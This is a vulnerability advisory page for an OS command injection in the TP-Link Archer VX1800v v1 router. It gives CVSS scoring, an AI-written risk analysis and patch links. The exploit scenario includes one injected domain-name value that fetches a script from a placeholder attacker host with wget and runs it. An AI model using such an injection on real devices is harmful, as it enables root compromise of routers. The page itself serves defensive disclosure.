Severity by source
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Adjacent HTTP interface (AV:A), no special conditions once reached (AC:L), an authenticated admin session is required (PR:H), no user interaction, and root command execution gives full C/I/A impact.
Primary rating from Vendor (TPLink).
CVSS VectorVendor: TPLink
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
An OS command injection vulnerability exists in Archer VX800v v1 due to insufficient input sanitization of the domain name parameter. An adjacent attacker who can access the relevant HTTP interface can modify the parameter to inject shell metacharacters, resulting in arbitrary code execution with root privileges.
Successful exploitation may allow remote code execution and complete compromise of the device.
AnalysisAI
OS command injection in the TP-Link Archer VX1800v (v1) router lets an adjacent, high-privileged attacker inject shell metacharacters through the domain name parameter of an HTTP management interface, yielding arbitrary command execution as root and full device takeover. The flaw scores CVSS 4.0 8.5 (High) and a vendor firmware patch is available; no public exploit identified at time of analysis. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three concrete prerequisites drawn from the CVSS vector and description: (1) adjacent network position (AV:A) - the attacker must reach the router's HTTP management interface from the same local network segment, not the public internet; (2) high administrative privileges (PR:H) - an authenticated admin session on the web interface is needed to reach the vulnerable configuration workflow; and (3) the ability to set the domain name parameter, which is the specific injectable field where shell metacharacters are not sanitized. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H) frames this as high impact but meaningfully gated: exploitation requires adjacent network access (AV:A - same L2/Wi-Fi segment, not the open internet) and high existing privileges (PR:H - an already-authenticated administrative session). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has gained a foothold on the local/adjacent network (e.g. a compromised Wi-Fi client or a rogue device on the LAN) and who holds valid administrator access to the router's web interface submits a domain name value containing shell metacharacters such as `example.com; wget http://attacker/x -O /tmp/x; sh /tmp/x`. … |
| Remediation | Patch available per vendor advisory: apply the latest Archer VX1800v firmware from the TP-Link download page (https://www.tp-link.com/en/support/download/archer-vx1800v/#Firmware) and review the FAQ advisory (https://www.tp-link.com/us/support/faq/5189/); an exact fixed version string was not provided in the input, so select the newest build TP-Link publishes for the v1 model. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, complete an inventory of all TP-Link Archer VX1800v (v1) routers across the organization, document current firmware versions, and verify the exact affected models against TP-Link's security advisory (noting the model naming discrepancy in CVE documentation). …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Archer Vx1800V V1
View allRoot-level OS command injection in the TR-069/CWMP management client of the TP-Link Archer VX1800v v1 gateway lets an at
A privilege escalation vulnerability exists in the HTTP authentication component in Archer VX1800v v1. Improper handling
Same weakness CWE-78 – OS Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-43963
GHSA-fxq7-2872-5xg8